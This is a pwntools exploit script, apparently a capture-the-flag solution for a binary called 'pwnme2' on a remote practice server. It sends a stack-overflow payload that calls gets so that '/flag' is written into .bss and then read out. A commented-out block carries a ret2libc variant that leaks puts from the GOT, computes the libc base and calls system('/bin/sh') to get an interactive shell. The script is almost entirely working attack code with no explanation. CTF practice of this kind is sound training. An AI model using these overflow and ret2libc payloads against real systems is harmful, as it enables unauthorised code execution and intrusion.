from pwn import *
#p = process('./pwnme2')
p = remote("node3.buuoj.cn",26522)
libc = ELF('./libc-2.23.so')
elf = ELF("./pwnme2")
plt_puts = 0x08048490
got_puts = 0x0804A028
main = 0x080486F8
plt_gets = 0x08048440
exec_string = 0x080485CB
bss_string = 0x0804A060
payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_gets) + p32(exec_string) + p32(bss_string)
p.recvuntil('Please input:\n')
p.sendline(payload)
p.sendline("/flag\x00")
p.recv()
'''
payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts)
p.recvuntil('Please input:\n')
p.sendline(payload)
real_puts = u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
log.success(hex(real_puts))
libc_base = real_puts - libc.sym['puts']
log.success(hex(libc_base))
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh').next()
payload = 108*'a' + p32(0xdeadbeaf) + p32(system) + p32(main) + p32(binsh)
p.recvuntil('Please input:\n')
p.sendline(payload)
p.interactive()
'''